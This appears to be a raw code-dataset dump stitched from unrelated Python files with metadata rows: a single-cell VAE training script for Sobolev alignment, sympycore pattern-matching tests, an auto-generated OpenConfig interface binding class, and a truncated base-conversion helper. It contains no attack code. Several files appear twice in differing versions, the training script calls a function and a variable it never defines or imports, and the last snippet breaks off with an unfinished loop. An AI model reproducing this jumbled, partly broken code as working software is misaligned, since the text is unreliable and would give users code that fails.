        sobolev_alignment_clf.scvi_models[x].get_latent_representation()
    )
torch.cuda.empty_cache()
gc.collect()
sys.exit("FINISH VAE TRAINING")
| 26.443396
| 119
| 0.727435
|
import os, sys, getopt
import pandas as pd
import numpy as np
import re
from anndata import AnnData
import torch
from pickle import dump, load
from copy import deepcopy
import gc
from sobolev_alignment import SobolevAlignment
from model_III_synthetic_params import *
from read_data import read_data
# Parse CLI options: -o output dir, -d data subfolder, -n artificial sample
# count, -t temp/mmap dir, -j parallel jobs.
n_artificial_samples = None
tmp_file = None
opts, args = getopt.getopt(sys.argv[1:],'o:d:n:t:j:p:',['output=', 'data=', 'artifsamples=', 'temp=', 'job=', 'perm='])
for opt, arg in opts:
    if opt in ("-o", "--output"):
        output_folder = str(arg)
    elif opt in ("-d", "--data"):
        data_subfolder = str(arg)
    elif opt in ('-n', '--artifsamples'):
        n_artificial_samples = int(arg)
    elif opt in ('-t', '--temp'):
        tmp_file = str(arg)
    elif opt in ('-j', '--job'):
        n_jobs = int(arg)
n_artificial_samples = n_artificial_samples if n_artificial_samples is not None else 10**6
n_artificial_samples = int(n_artificial_samples)
tmp_file = tmp_file if tmp_file is not None else '/tmp/SM/'
# Load source (cell line) and target (tumor) expression data.
# Fixed: the left-hand name was truncated to 'source,' in this copy.
X_source, X_target = read_data(data_folder, data_subfolder)
gc.collect()
# Read the previously selected scVI hyper-parameters.
# Fixed: the first name was truncated to 'ell_line_scvi_params'.
cell_line_scvi_params, tumor_scvi_params = read_scvi_params(output_folder)
sobolev_alignment_clf = SobolevAlignment(
    source_scvi_params=cell_line_scvi_params,
    target_scvi_params=tumor_scvi_params,
    source_krr_params=default_krr_params,
    target_krr_params=default_krr_params,
    n_jobs=n_jobs
)
# Exit early when a trained model already exists.
# Fixed: the 'if' keyword was missing from this line.
if 'sobolev_alignment_model' not in os.listdir(output_folder):
    pass
else:
    sys.exit("VAE ALREADY TRAINED")
sobolev_alignment_clf.n_jobs = n_jobs
# Train only the VAEs; artificial sampling / KRR approximation happen later.
sobolev_alignment_clf.fit(
    X_source=X_source,
    X_target=X_target,
    source_batch_name=batch_name,
    target_batch_name=batch_name,
    continuous_covariate_names=continuous_covariate_names,
    n_artificial_samples=100,
    fit_vae=True,
    sample_artificial=False,
    krr_approx=False,
    n_samples_per_sample_batch=10**6,
    frac_save_artificial=1.,
    save_mmap=tmp_file,
    log_input=log_input,
    no_posterior_collapse=no_posterior_collapse,
    frob_norm_source=frob_norm_source
)
# Persist the VAEs only (with_krr=False).
if 'sobolev_alignment_model' not in os.listdir(output_folder):
    sobolev_alignment_clf.save('%s/sobolev_alignment_model/'%(output_folder), with_krr=False)
gc.collect()
# Save the latent embedding of each scVI model.
for x in sobolev_alignment_clf.scvi_models:
    np.savetxt(
        '%s/scvi_embedding_%s.csv'%(output_folder, x),
        sobolev_alignment_clf.scvi_models[x].get_latent_representation()
    )
torch.cuda.empty_cache()
gc.collect()
sys.exit("FINISH VAE TRAINING")
| true
| true
|
790c7b5b9f22d1052daa93cf8ab7e00c67f239ff
| 5,297
|
py
|
Python
|
sympycore/basealgebra/tests/test_matches.py
|
radovankavicky/pymaclab
|
21da758f64ed0b62969c9289576f677e977cfd98
|
[
"Apache-2.0"
] | 96
|
2015-01-25T05:59:56.000Z
|
2021-12-29T14:05:22.000Z
|
sympycore/basealgebra/tests/test_matches.py
|
1zinnur9/pymaclab
|
21da758f64ed0b62969c9289576f677e977cfd98
|
[
"Apache-2.0"
] | 3
|
2015-12-17T19:25:46.000Z
|
2018-06-19T07:05:20.000Z
|
sympycore/basealgebra/tests/test_matches.py
|
1zinnur9/pymaclab
|
21da758f64ed0b62969c9289576f677e977cfd98
|
[
"Apache-2.0"
] | 36
|
2016-01-31T15:22:01.000Z
|
2021-03-29T07:03:07.000Z
|
from sympycore import CollectingField as Algebra
# Short aliases for the CollectingField constructors exercised by the tests below.
Symbol = Algebra.Symbol
Number = Algebra.Number
Add = Algebra.Add
Mul = Algebra.Mul
Pow = Algebra.Pow
Terms = Algebra.Terms
Factors = Algebra.Factors
def test_symbol():
    """Symbol matching: self-match, mismatch, and wildcard substitution rules."""
    # removed unused local `p = Symbol('p')`
    s = Symbol('s')
    t = Symbol('t')
    assert s.matches(s)=={}
    assert s.matches(t)==None
    # with s declared wild, it binds to t
    assert s.matches(t,{},([s,],[True,]))=={s:t}
    # with both wild, no consistent assignment exists
    assert s.matches(t,{},([s,t],[True,True]))==None
def test_number():
    """A Number matches only the identical numeric value, nothing structural."""
    sym = Symbol('s')
    two = Number(2)
    assert two.matches(2) == {}
    assert two.matches(3) is None
    assert two.matches(sym) is None
    assert two.matches(sym + 2) is None
def test_wild():
    """A wild symbol binds to any expression except itself."""
    w, s = Symbol('w'), Symbol('s')
    wildinfo = [w], [True]
    assert w.matches(Number(2), {}, wildinfo) == {w: 2}
    assert w.matches(s, {}, wildinfo) == {w: s}
    assert w.matches(w, {}, wildinfo) is None
    assert w.matches(s + 2, {}, wildinfo) == {w: s + 2}
    assert w.matches(2 * s, {}, wildinfo) == {w: 2 * s}
    assert w.matches(s ** 2, {}, wildinfo) == {w: s ** 2}
def test_symbol_plain():
    """A plain (non-wild) symbol matches only itself.

    Renamed from ``test_symbol``: this second definition shadowed the earlier
    test of the same name, so only one of the two ever ran under pytest.
    """
    s = Symbol('s')
    assert s.matches(s)=={}
    assert s.matches(2)==None
    assert s.matches(2+s)==None
    assert s.matches(2*s)==None
    assert s.matches(s**2)==None
def test_term():
    """A coefficient*symbol term matches only the identical term."""
    s = Symbol('s')
    term = 2 * s
    assert term.matches(2 * s) == {}
    assert term.matches(3 * s) is None
    assert term.matches(s) is None
    assert term.matches(Number(2)) is None
    assert term.matches(s ** 2) is None
def _test_wild_term():
    """(disabled: leading underscore keeps pytest from collecting it)
    Wild inside a 2*w term: the matched expression is divided by 2."""
    w = Symbol('w')
    p = 2*w
    s = Symbol('s')
    t = Symbol('t')
    wargs = {},([w],[True])
    assert p.matches(Number(1),*wargs)=={w:Number(1)/2}
    assert p.matches(Number(2),*wargs)=={w:1}
    assert p.matches(2*s,*wargs)=={w:s}
    assert p.matches(3*s,*wargs)=={w:s*Number(3)/2}
    assert p.matches(t*s,*wargs)=={w:t*s/2}
    assert p.matches(s**2,*wargs)=={w:s**2/2}
    m = p.matches(2*s+2,*wargs)
    assert m is not None and m[w]==(2*(s+1))/2
    assert p.matches(2*s+4,*wargs)=={w:(s+2)*2/2}
    assert p.matches(2*s+5,*wargs)=={w:(2*s+Number(5))/2}
    assert p.matches(2*s+t,*wargs)=={w:(2*s+t)/2}
    assert p.matches(2*s-2*t,*wargs)=={w:(s-t)*2/2}
def _test_wild_symbol_term():
    """(disabled) Wild added to a symbol binds to the remainder of the sum."""
    w = Symbol('w')
    s = Symbol('s')
    t = Symbol('t')
    p = s+w
    wargs = {},([w],[True])
    assert p.matches(s+2,*wargs)=={w:2}
    assert p.matches(t+2,*wargs)=={w:t+2-s}
def _test_wild_wild_term():
    """(disabled) Two wilds in w1 + 2*w2: several partitions are acceptable."""
    w1 = Symbol('w1')
    w2 = Symbol('w2')
    p = w1 + 2*w2
    s = Symbol('s')
    t = Symbol('t')
    wargs = {},([w1,w2],[True,True])
    assert p.matches(Number(2),*wargs) in [{w2:0,w1:2},{w2:1,w1:0}]
    assert p.matches(2*s+t+2,*wargs) in [{w2:1+s,w1:t},{w1:2*s+t,w2:1},{w2:s,w1:t+2},
                                         {w1:2+2*s, w2:t/2}]
def _test_wild_factor():
    """(disabled) Wild under a square, w**2, binds only to perfect-square factors;
    commented asserts cover numeric/radical cases that are not exercised."""
    w = Symbol('w')
    p = w**2
    s = Symbol('s')
    t = Symbol('t')
    wargs = {},([w],[True])
    #assert p.matches(Number(2),*wargs)=={w:Number(2)**(Number(1)/2)}
    #assert p.matches(Number(4),*wargs)=={w:2}
    #assert p.matches(Number(16),*wargs)=={w:4}
    #assert p.matches(Number(9),*wargs)=={w:3}
    #assert p.matches(Number(8),*wargs)=={w:2*Number(2)**(Number(1)/2)}
    assert p.matches(s,*wargs)==None
    assert p.matches(s**2,*wargs)=={w:s}
    assert p.matches(s**3,*wargs)==None
    #assert p.matches(s**4,*wargs)=={w:s**2}
    assert p.matches(s+2,*wargs)==None
    assert p.matches(s*2,*wargs)==None
    assert p.matches(s**2*2,*wargs)==None
    #assert p.matches(s**2*4,*wargs)=={w:2*s}
    #assert p.matches(s**2*t**2,*wargs)=={w:s*t}
    #assert p.matches(4*s**2*t**2,*wargs)=={w:2*s*t}
    #assert p.matches(s**4*t**4,*wargs)=={w:(s*t)**2}
    #assert p.matches(s**2*t**4,*wargs)=={w:s*t**2}
    assert p.matches(s**2*t**3,*wargs)==None
    #assert p.matches(s**2*t**-4,*wargs)=={w:s*t**-2}
def _test_wild_symbol_factor():
    """(disabled) Wild multiplied by a symbol, s*w, binds to expr/s."""
    w = Symbol('w')
    s = Symbol('s')
    t = Symbol('t')
    p = s*w
    wargs = {},([w],[True])
    assert p.matches(Number(1),*wargs)=={w:1/s}
    assert p.matches(s,*wargs)=={w:1}
    assert p.matches(2+t,*wargs)=={w:(2+t)/s}
def test_symbol2():
    """match(): exact expressions and single-wild capture on atoms."""
    x = Symbol('x')
    a, b, c, p, q = map(Symbol, 'abcpq')
    expr = x
    assert expr.match(x) == {}
    assert expr.match(a, a) == {a: x}
    expr = Number(5)
    assert expr.match(c, c) == {c: 5}
    assert expr.match(expr) == {}
    assert expr.match(expr + 1) is None
def _test_add():
    """(disabled) match() over sums: wilds absorb whichever addends remain,
    optionally constrained by a predicate (here: atoms only)."""
    x,y,a,b,c = map(Symbol, 'xyabc')
    p,q,r = map(Symbol, 'pqr')
    e = a+b
    assert e.match(p+b,p) == {p: a}
    assert e.match(p+a,p) == {p: b}
    e = 1+b
    assert e.match(p+b,p) == {p: 1}
    e = a+b+c
    assert e.match(a+p+c,p) == {p: b}
    assert e.match(b+p+c,p) == {p: a}
    e = a+b+c+x
    assert e.match(a+p+x+c,p) == {p: b}
    assert e.match(b+p+c+x,p) == {p: a}
    assert e.match(b) == None
    assert e.match(b+p,p) == {p: a+c+x}
    assert e.match(a+p+c,p) == {p: b+x}
    assert e.match(b+p+c,p) == {p: a+x}
    e = 4*x+5
    assert e.match(3*x+p,p) == {p: x+5}
    # (p, predicate) restricts the wild to argument-free (atomic) expressions
    assert e.match(4*x+p,(p,lambda expr: not expr.args)) == {p: 5}
    assert e.match(p*x+5,(p,lambda expr: not expr.args)) == {p: 4}
    assert e.match(p*x+q,(p,lambda expr: not expr.args),(q,lambda expr: not expr.args)) == {p: 4, q: 5}
    e = 4*x+5*y+6
    assert e.match(p*x+q*y+r,(p,lambda expr: not expr.args),
                   (q,lambda expr: not expr.args),
                   (r,lambda expr: not expr.args)) == {p: 4, q: 5, r: 6}
| 29.427778
| 103
| 0.537474
|
from sympycore import CollectingField as Algebra
Symbol = Algebra.Symbol
Number = Algebra.Number
Add = Algebra.Add
Mul = Algebra.Mul
Pow = Algebra.Pow
Terms = Algebra.Terms
Factors = Algebra.Factors
def test_symbol():
p = Symbol('p')
s = Symbol('s')
t = Symbol('t')
assert s.matches(s)=={}
assert s.matches(t)==None
assert s.matches(t,{},([s,],[True,]))=={s:t}
assert s.matches(t,{},([s,t],[True,True]))==None
def test_number():
s = Symbol('s')
n = Number(2)
assert n.matches(2)=={}
assert n.matches(3)==None
assert n.matches(s)==None
assert n.matches(s+2)==None
def test_wild():
w = Symbol('w')
s = Symbol('s')
wargs = [w],[True]
assert w.matches(Number(2),{},wargs)=={w:2}
assert w.matches(s,{},wargs)=={w:s}
assert w.matches(w,{},wargs)==None
assert w.matches(s+2,{},wargs)=={w:s+2}
assert w.matches(2*s,{},wargs)=={w:2*s}
assert w.matches(s**2,{},wargs)=={w:s**2}
def test_symbol():
s = Symbol('s')
assert s.matches(s)=={}
assert s.matches(2)==None
assert s.matches(2+s)==None
assert s.matches(2*s)==None
assert s.matches(s**2)==None
def test_term():
s = Symbol('s')
p = 2*s
assert p.matches(2*s)=={}
assert p.matches(3*s)==None
assert p.matches(s)==None
assert p.matches(Number(2))==None
assert p.matches(s**2)==None
def _test_wild_term():
w = Symbol('w')
p = 2*w
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:Number(1)/2}
assert p.matches(Number(2),*wargs)=={w:1}
assert p.matches(2*s,*wargs)=={w:s}
assert p.matches(3*s,*wargs)=={w:s*Number(3)/2}
assert p.matches(t*s,*wargs)=={w:t*s/2}
assert p.matches(s**2,*wargs)=={w:s**2/2}
m = p.matches(2*s+2,*wargs)
assert m is not None and m[w]==(2*(s+1))/2
assert p.matches(2*s+4,*wargs)=={w:(s+2)*2/2}
assert p.matches(2*s+5,*wargs)=={w:(2*s+Number(5))/2}
assert p.matches(2*s+t,*wargs)=={w:(2*s+t)/2}
assert p.matches(2*s-2*t,*wargs)=={w:(s-t)*2/2}
def _test_wild_symbol_term():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s+w
wargs = {},([w],[True])
assert p.matches(s+2,*wargs)=={w:2}
assert p.matches(t+2,*wargs)=={w:t+2-s}
def _test_wild_wild_term():
w1 = Symbol('w1')
w2 = Symbol('w2')
p = w1 + 2*w2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w1,w2],[True,True])
assert p.matches(Number(2),*wargs) in [{w2:0,w1:2},{w2:1,w1:0}]
assert p.matches(2*s+t+2,*wargs) in [{w2:1+s,w1:t},{w1:2*s+t,w2:1},{w2:s,w1:t+2},
{w1:2+2*s, w2:t/2}]
def _test_wild_factor():
w = Symbol('w')
p = w**2
s = Symbol('s')
t = Symbol('t')
wargs = {},([w],[True])
assert p.matches(s,*wargs)==None
assert p.matches(s**2,*wargs)=={w:s}
assert p.matches(s**3,*wargs)==None
assert p.matches(s+2,*wargs)==None
assert p.matches(s*2,*wargs)==None
assert p.matches(s**2*2,*wargs)==None
assert p.matches(s**2*t**3,*wargs)==None
def _test_wild_symbol_factor():
w = Symbol('w')
s = Symbol('s')
t = Symbol('t')
p = s*w
wargs = {},([w],[True])
assert p.matches(Number(1),*wargs)=={w:1/s}
assert p.matches(s,*wargs)=={w:1}
assert p.matches(2+t,*wargs)=={w:(2+t)/s}
def test_symbol2():
x = Symbol('x')
a,b,c,p,q = map(Symbol, 'abcpq')
e = x
assert e.match(x) == {}
assert e.match(a,a) == {a: x}
e = Number(5)
assert e.match(c,c) == {c: 5}
assert e.match(e) == {}
assert e.match(e+1) == None
def _test_add():
x,y,a,b,c = map(Symbol, 'xyabc')
p,q,r = map(Symbol, 'pqr')
e = a+b
assert e.match(p+b,p) == {p: a}
assert e.match(p+a,p) == {p: b}
e = 1+b
assert e.match(p+b,p) == {p: 1}
e = a+b+c
assert e.match(a+p+c,p) == {p: b}
assert e.match(b+p+c,p) == {p: a}
e = a+b+c+x
assert e.match(a+p+x+c,p) == {p: b}
assert e.match(b+p+c+x,p) == {p: a}
assert e.match(b) == None
assert e.match(b+p,p) == {p: a+c+x}
assert e.match(a+p+c,p) == {p: b+x}
assert e.match(b+p+c,p) == {p: a+x}
e = 4*x+5
assert e.match(3*x+p,p) == {p: x+5}
assert e.match(4*x+p,(p,lambda expr: not expr.args)) == {p: 5}
assert e.match(p*x+5,(p,lambda expr: not expr.args)) == {p: 4}
assert e.match(p*x+q,(p,lambda expr: not expr.args),(q,lambda expr: not expr.args)) == {p: 4, q: 5}
e = 4*x+5*y+6
assert e.match(p*x+q*y+r,(p,lambda expr: not expr.args),
(q,lambda expr: not expr.args),
(r,lambda expr: not expr.args)) == {p: 4, q: 5, r: 6}
| true
| true
|
790c7d33ed5f2d9646494d9e9137958f6fb0bbd0
| 9,689
|
py
|
Python
|
napalm_yang/models/openconfig/interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 64
|
2016-10-20T15:47:18.000Z
|
2021-11-11T11:57:32.000Z
|
napalm_yang/models/openconfig/interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 126
|
2016-10-05T10:36:14.000Z
|
2019-05-15T08:43:23.000Z
|
napalm_yang/models/openconfig/interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 63
|
2016-11-07T15:23:08.000Z
|
2021-09-22T14:41:16.000Z
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-interfaces - based on the path /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface-ref/config. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.
    YANG Description: Configured reference to interface / subinterface
    """
    # NOTE(review): auto-generated by pyangbind -- regenerate from the YANG
    # model rather than hand-editing this file.
    __slots__ = ("_path_helper", "_extmethods", "__interface", "__subinterface")
    _yang_name = "config"
    _pybind_generated_by = "container"
    def __init__(self, *args, **kwargs):
        self._path_helper = False
        self._extmethods = False
        # Both leaves are YANG leafrefs carried as plain unicode strings.
        self.__interface = YANGDynClass(
            base=six.text_type,
            is_leaf=True,
            yang_name="interface",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/interfaces/ip",
            defining_module="openconfig-if-ip",
            yang_type="leafref",
            is_config=True,
        )
        self.__subinterface = YANGDynClass(
            base=six.text_type,
            is_leaf=True,
            yang_name="subinterface",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/interfaces/ip",
            defining_module="openconfig-if-ip",
            yang_type="leafref",
            is_config=True,
        )
        load = kwargs.pop("load", None)
        if args:
            # Copy-constructor path: a single source object with matching
            # attributes; only elements reported as changed are copied.
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)
    def _path(self):
        # Path of this container within the YANG tree: derived from the
        # parent when attached, otherwise the static schema path.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "interfaces",
                "interface",
                "subinterfaces",
                "subinterface",
                "ipv4",
                "unnumbered",
                "interface-ref",
                "config",
            ]
    def _get_interface(self):
        """
        Getter method for interface, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/interface (leafref)
        YANG Description: Reference to a base interface. If a reference to a
        subinterface is required, this leaf must be specified
        to indicate the base interface.
        """
        return self.__interface
    def _set_interface(self, v, load=False):
        """
        Setter method for interface, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/interface (leafref)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_interface is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_interface() directly.
        YANG Description: Reference to a base interface. If a reference to a
        subinterface is required, this leaf must be specified
        to indicate the base interface.
        """
        if hasattr(v, "_utype"):
            # Unwrap values handed over from another YANGDynClass wrapper.
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=six.text_type,
                is_leaf=True,
                yang_name="interface",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/interfaces/ip",
                defining_module="openconfig-if-ip",
                yang_type="leafref",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """interface must be of a type compatible with leafref""",
                    "defined-type": "leafref",
                    "generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip', defining_module='openconfig-if-ip', yang_type='leafref', is_config=True)""",
                }
            )
        self.__interface = t
        if hasattr(self, "_set"):
            self._set()
    def _unset_interface(self):
        # Reset the leaf to a fresh default (unchanged) instance.
        self.__interface = YANGDynClass(
            base=six.text_type,
            is_leaf=True,
            yang_name="interface",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/interfaces/ip",
            defining_module="openconfig-if-ip",
            yang_type="leafref",
            is_config=True,
        )
    def _get_subinterface(self):
        """
        Getter method for subinterface, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/subinterface (leafref)
        YANG Description: Reference to a subinterface -- this requires the base
        interface to be specified using the interface leaf in
        this container. If only a reference to a base interface
        is required, this leaf should not be set.
        """
        return self.__subinterface
    def _set_subinterface(self, v, load=False):
        """
        Setter method for subinterface, mapped from YANG variable /interfaces/interface/subinterfaces/subinterface/ipv4/unnumbered/interface_ref/config/subinterface (leafref)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_subinterface is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_subinterface() directly.
        YANG Description: Reference to a subinterface -- this requires the base
        interface to be specified using the interface leaf in
        this container. If only a reference to a base interface
        is required, this leaf should not be set.
        """
        if hasattr(v, "_utype"):
            # Unwrap values handed over from another YANGDynClass wrapper.
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=six.text_type,
                is_leaf=True,
                yang_name="subinterface",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/interfaces/ip",
                defining_module="openconfig-if-ip",
                yang_type="leafref",
                is_config=True,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """subinterface must be of a type compatible with leafref""",
                    "defined-type": "leafref",
                    "generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="subinterface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip', defining_module='openconfig-if-ip', yang_type='leafref', is_config=True)""",
                }
            )
        self.__subinterface = t
        if hasattr(self, "_set"):
            self._set()
    def _unset_subinterface(self):
        # Reset the leaf to a fresh default (unchanged) instance.
        self.__subinterface = YANGDynClass(
            base=six.text_type,
            is_leaf=True,
            yang_name="subinterface",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/interfaces/ip",
            defining_module="openconfig-if-ip",
            yang_type="leafref",
            is_config=True,
        )
    # Expose the leaves as attributes; __builtin__.property keeps PY2/PY3
    # compatibility via the shim at the top of the file.
    interface = __builtin__.property(_get_interface, _set_interface)
    subinterface = __builtin__.property(_get_subinterface, _set_subinterface)
    _pyangbind_elements = OrderedDict(
        [("interface", interface), ("subinterface", subinterface)]
    )
| 38.756
| 338
| 0.618846
|
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
__slots__ = ("_path_helper", "_extmethods", "__interface", "__subinterface")
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__interface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="interface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
self.__subinterface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="subinterface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"interfaces",
"interface",
"subinterfaces",
"subinterface",
"ipv4",
"unnumbered",
"interface-ref",
"config",
]
def _get_interface(self):
return self.__interface
def _set_interface(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="interface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """interface must be of a type compatible with leafref""",
"defined-type": "leafref",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="interface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip', defining_module='openconfig-if-ip', yang_type='leafref', is_config=True)""",
}
)
self.__interface = t
if hasattr(self, "_set"):
self._set()
def _unset_interface(self):
self.__interface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="interface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
def _get_subinterface(self):
return self.__subinterface
def _set_subinterface(self, v, load=False):
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=six.text_type,
is_leaf=True,
yang_name="subinterface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """subinterface must be of a type compatible with leafref""",
"defined-type": "leafref",
"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="subinterface", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/interfaces/ip', defining_module='openconfig-if-ip', yang_type='leafref', is_config=True)""",
}
)
self.__subinterface = t
if hasattr(self, "_set"):
self._set()
def _unset_subinterface(self):
self.__subinterface = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="subinterface",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/interfaces/ip",
defining_module="openconfig-if-ip",
yang_type="leafref",
is_config=True,
)
interface = __builtin__.property(_get_interface, _set_interface)
subinterface = __builtin__.property(_get_subinterface, _set_subinterface)
_pyangbind_elements = OrderedDict(
[("interface", interface), ("subinterface", subinterface)]
)
| true
| true
|
790c7d52cffef7989eab03b3b36c8feaf7bb9e54
| 639
|
py
|
Python
|
changebase.py
|
quake0day/oj
|
c09333d1738f8735de0d5d825db6f4b707585670
|
[
"MIT"
] | null | null | null |
changebase.py
|
quake0day/oj
|
c09333d1738f8735de0d5d825db6f4b707585670
|
[
"MIT"
] | null | null | null |
changebase.py
|
quake0day/oj
|
c09333d1738f8735de0d5d825db6f4b707585670
|
[
"MIT"
] | null | null | null |
class Solution(object):
    """Integer base-conversion helpers for bases 2..16."""

    def changebase(self, n, base):
        """Return non-negative integer *n* rendered in *base* as a digit string.

        Fixes over the original: returns "0" for n == 0 (previously the
        empty string) and uses floor division (``//``) so the code behaves
        identically on Python 2 and Python 3 (``/`` on py3 ints is float
        division, which broke the loop).
        """
        if n == 0:
            return "0"
        digits = "0123456789ABCDEF"
        remstack = []
        while n > 0:
            remstack.append(n % base)
            n //= base
        # Remainders are produced least-significant first; reverse them.
        return "".join(digits[rem] for rem in reversed(remstack))

    def countNum(self, n, base):
        """Debug helper: drop the last digit of ``changebase(n, base)``,
        print each remaining digit (least-significant first) and the value
        they represent in *base*.  Returns None (prints only)."""
        res = self.changebase(n, base)[:-1][::-1]
        count = 0
        for i, digit in enumerate(res):
            print(int(digit))
